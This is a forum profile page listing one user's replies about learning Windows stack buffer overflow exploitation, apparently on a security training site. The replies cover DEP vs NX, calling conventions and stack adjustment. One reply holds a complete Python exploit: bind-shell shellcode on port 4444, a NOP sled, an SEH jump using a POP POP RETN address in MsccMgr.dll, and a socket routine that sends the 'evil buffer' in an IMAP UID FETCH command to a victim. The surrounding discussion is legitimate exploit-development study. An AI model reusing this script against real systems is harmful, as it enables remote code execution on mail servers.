zaixer

Forum Replies Created

Viewing 5 reply threads
  • Author
    Posts
    • #53216
      zaixer
      Participant

      I think DEP is windows based and NX is linux based…correct me please if I am wrong. the point is not to make it work only. its about understanding why it did not work :). I do not like leaving it just because it did not work 🙂

    • #53119
      zaixer
      Participant


      Aren’t the function parameters you’ve supplied (ptr to param1 in your example) getting popped also?
      I mean, if you overwrite saved EIP with some acceptable address, and after DoStuff returns, EIP gets popped off the stack, but these passed input parameters must be popped too?
      If I am correct,then ESP will point to “+ some bytes” after “EIP + input vars”, and not directly after “EIP” and this is the reason you add four symbols before the shellcode (my $preshellcode = “XXXX”;) ?
      Thank you!”

      and


      I figure out my first question when i read this article http://en.wikipedia.org/wiki/X…..entions. In my c code i use to debug, if i defines the DoStuff function as “void _cdecl DoStuff(char* param1)” or “void DoStuff(char* param1)”, then there is no need to adjust the shellcode with 4 more bytes.If i defines the DoStuff function as “void _stdcall DoStuff(char* param1)”,then we have to adjust the shellcode with 4 more bytes. The difference is made by whom is responsible for cleaning the arguments from the stack,the caller or the callee.Is it right?”

      the key point is that function arguments gets popped out of the stack too, that’s why ESP is pointing to higher address values. also this may differ from function to another based on the first post which indicates that this depends on who is responsible for cleaning the arguments from the stack !

    • #53201
      zaixer
      Participant

      @dynamik thanks for your response. For some reason it worked after adding some NOPs after the shellcode ! please check the code below:

      ====================================================================================================================
      shellcode = (“xb8x3bxe5xd0x36xdaxd3xd9x74x24xf4x5ax29xc9xb1”
      “x56x31x42x13x83xc2x04x03x42x34x07x25xcaxa2x4e”
      “xc6x33x32x31x4exd6x03x63x34x92x31xb3x3exf6xb9”
      “x38x12xe3x4ax4cxbbx04xfbxfbx9dx2bxfcxcdx21xe7”
      “x3ex4fxdexfax12xafxdfx34x67xaex18x28x87xe2xf1”
      “x26x35x13x75x7ax85x12x59xf0xb5x6cxdcxc7x41xc7”
      “xdfx17xf9x5cx97x8fx72x3ax08xb1x57x58x74xf8xdc”
      “xabx0exfbx34xe2xefxcdx78xa9xd1xe1x75xb3x16xc5”
      “x65xc6x6cx35x18xd1xb6x47xc6x54x2bxefx8dxcfx8f”
      “x11x42x89x44x1dx2fxddx03x02xaex32x38x3ex3bxb5”
      “xefxb6x7fx92x2bx92x24xbbx6ax7ex8bxc4x6dx26x74”
      “x61xe5xc5x61x13xa4x81x46x2ex57x52xc0x39x24x60”
      “x4fx92xa2xc8x18x3cx34x2ex33xf8xaaxd1xbbxf9xe3”
      “x15xefxa9x9bxbcx8fx21x5cx40x5axe5x0cxeex34x46”
      “xfdx4exe4x2ex17x41xdbx4fx18x8bx6ax48xd6xefx3f”
      “x3fx1bx10xaexe3x92xf6xbax0bxf3xa1x52xeex20x7a”
      “xc5x11x03xd6x5ex86x1bx30x58xa9x9bx16xcbx06x33”
      “xf1x9fx44x80xe0xa0x40xa0x6bx99x03x3ax02x68xb5”
      “x3bx0fx1ax56xa9xd4xdax11xd2x42x8dx76x24x9bx5b”
      “x6bx1fx35x79x76xf9x7ex39xadx3ax80xc0x20x06xa6”
      “xd2xfcx87xe2x86x50xdexbcx70x17x88x0ex2axc1x67”
      “xd9xbax94x4bxdaxbcx98x81xacx20x28x7cxe9x5fx85”
      “xe8xfdx18xfbx88x02xf3xbfxb7xf3xc9x55x2fxaaxb8”
      “x17x2dx4dx17x5bx48xcex9dx24xafxcexd4x21xebx48”
      “x05x58x64x3dx29xcfx85x14”)

      buffer = “x90” * 300 #Nop Sled to fill the first 300 bytes before the shellcode
      buffer += shellcode #Shellcode to spawn a shell listening on port 4444
      buffer += “x90” *81 #Nop Sled to fill the rest of the buffer after the shellcode
      buffer += “xEBx06x90x90” #Short JMP of 6 bytes
      buffer += “x95xcbx0dx60” #Memory Address of POP POP RETN sequence at module MsccMgr.dll
      buffer += “x90″*8+”xe9xffxfcxffxff” #8 Bytes of NOPs followed by 700 Bytes backward jump
      buffer += “}” *50 #Junk

      s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

      try:
      s.connect((sys.argv[1],int(sys.argv[2])))
      except:
      print “Can’t connect to server!n”
      sys.exit(0)

      print “[+] Connecting to victim !”
      data=s.recv(1024)
      print “[+] “+data.rstrip()
      print “[+] Sending evil buffer…”
      s.send(‘A013 UID FETCH 4827313:4827313 ‘+ buffer + “rn”)
      s.close()
      print “[+] Exploitation Successfuln”
      print “[+] Please Connect to port 4444 on victim IP now !n”
      ==================================================================================================================
      So when moving the 81 NOPs that are after the shellcode and placing them before the shellcode (adding them to the 300 NOPs already there), the exploit fails !

      Actually I would appreciate letting me know what is know by stack adjustment !

      @superkojiman I am connecting to it from local machine itself: nc 127.0.0.1 444 to avoid any network problems

    • #53117
      zaixer
      Participant

      After search I found answers:

      1-why EBP was not overwritten with the buffer ?

      Answer here :
      http://msdn.microsoft.com/en-us/library/2kxx5t2c(v=vs.71).aspx

      2-is not it expected that the supplied buffer starts from the ESP and going downside towards the EIP at the bottom of the stack? w hich means that the ESP should points to AAAAAAA instead of CCCCCCCCC ?

      Answer here:
      https://www.corelan.be/index.php/forum/exploit-writing-win32-stack-bof-direct-ret/question-about-esp-in-tutorial-pt1/

    • #53193
      zaixer
      Participant

      Thanks Hany,

      Actually I have already reviewed it, however, I doubt that it is working one as the shellcode used contains bad chars like x00 !

    • #53116
      zaixer
      Participant

      Thanks for the help. You cleared the confusion !

Viewing 5 reply threads

Copyright ©2020 Caendra, Inc.

Contact Us

Thoughts, suggestions, issues? Send us an email, and we'll get back to you.

Sending

Sign in with Caendra

Forgot password?Sign up

Forgot your details?